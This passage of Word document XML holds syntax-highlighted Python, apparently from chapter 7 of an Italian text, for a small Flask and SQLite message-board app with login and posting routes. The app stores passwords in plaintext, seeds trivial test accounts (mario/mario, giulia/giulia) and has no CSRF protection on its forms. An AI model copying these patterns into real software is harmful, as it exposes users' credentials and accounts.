            <w:u w:val="single"/>
          </w:rPr>
          <w:t xml:space="preserve">Cap. 7</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">DB </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"miniblog.db"</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ────────────────────────────────────────────────────────</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Inizializzazione del database (eseguita la prima volta)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ────────────────────────────────────────────────────────</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">def</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> init_db():</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CREATE TABLE IF NOT EXISTS utenti (</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            id INTEGER PRIMARY KEY AUTOINCREMENT,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            username TEXT UNIQUE NOT NULL,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            password TEXT NOT NULL</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        )</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    cur.execute(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"""</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        CREATE TABLE IF NOT EXISTS messaggi (</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            id INTEGER PRIMARY KEY AUTOINCREMENT,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            utente_id INTEGER NOT NULL,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            testo TEXT NOT NULL,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            FOREIGN KEY (utente_id) REFERENCES utenti(id)</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mmentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Inseriamo due utenti di test (solo se non esistono già)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    cur.execute(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"INSERT OR IGNORE INTO utenti (username, password) VALUES (?, ?)"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"mario"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"mario"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    cur.execute(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"INSERT OR IGNORE INTO utenti (username, password) VALUES (?, ?)"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"giulia"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"giulia"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    conn.commit()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    conn.close()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ────────────────────────────────────────────────────────</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Pagina principale: bacheca dei messaggi</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ────────────────────────────────────────────────────────</w:t>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SELECT messaggi.testo, utenti.username</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        FROM messaggi JOIN utenti ON messaggi.utente_id = utenti.id</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        ORDER BY messaggi.id DESC</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    messaggi </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> cur.fetchall()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    conn.close()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    utente </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> session.get(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"username"</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&lt;!DOCTYPE html&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;html&gt;&lt;head&gt;&lt;title&gt;MiniBlog&lt;/title&gt;&lt;/head&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;body&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;h1&gt;MiniBlog&lt;/h1&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">% i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">f utente %}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                &lt;p&gt;Ciao &lt;b&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> utente </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/b&gt;! &lt;a href="/logout"&gt;Esci&lt;/a&gt;&lt;/p&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                &lt;form method="POST" action="/pubblica"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                    &lt;textarea name="testo" rows="3" cols="40"&gt;&lt;/textarea&gt;&lt;br&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                    &lt;button type="submit"&gt;Pubblica&lt;/button&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                &lt;/form&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">% e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">lse %}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                &lt;p&gt;&lt;a href="/login"&gt;Accedi&lt;/a&gt; per pubblicare&lt;/p&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">% e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ndif %}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;hr&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;h2&gt;Messaggi&lt;/h2&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">% f</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">or msg in messaggi %}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                &lt;p&gt;&lt;b&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> msg[1] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/b&gt;: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">{{</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> msg[0] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">}}</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;/p&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="SpecialCharTok"/>
        </w:rPr>
        <w:t xml:space="preserve">% e</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">ndfor %}</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;/body&gt;&lt;/html&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, messaggi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">messaggi, utente</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">utente)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ────────────────────────────────────────────────────────</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Login</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ────────────────────────────────────────────────────────</w:t>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id FROM utenti WHERE username=? AND password=?"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                    (username, password))</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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> riga:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            session[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"utente_id"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> riga[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="DecValTok"/>
        </w:rPr>
        <w:t xml:space="preserve">0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">]</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            session[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"username"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> username</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> redirect(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:v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"Credenziali errate. &lt;a href='/login'&gt;Riprova&lt;/a&gt;"</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StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;h1&gt;Login&lt;/h1&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;form method="POST"&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            Utente: &lt;input name="username"&gt;&lt;br&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            Password: &lt;input name="password" type="password"&gt;&lt;br&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">            &lt;button type="submit"&gt;Accedi&lt;/button&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;/form&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        &lt;p&gt;Utenti di test: mario/mario, giulia/giulia&lt;/p&gt;</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    """</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ────────────────────────────────────────────────────────</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Pubblicazione di un messaggio</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ────────────────────────────────────────────────────────</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">@app.route</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"/pubblica"</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pubblica():</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br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    testo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> request.form.get(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"testo"</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ntrolFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> testo:</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"INSERT INTO messaggi (utente_id, testo) VALUES (?, ?)"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">                    (session[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"utente_id"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">], testo))</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">        conn.commit()</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redirect(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"/"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ────────────────────────────────────────────────────────</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Logout</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># ────────────────────────────────────────────────────────</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">@app.route</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
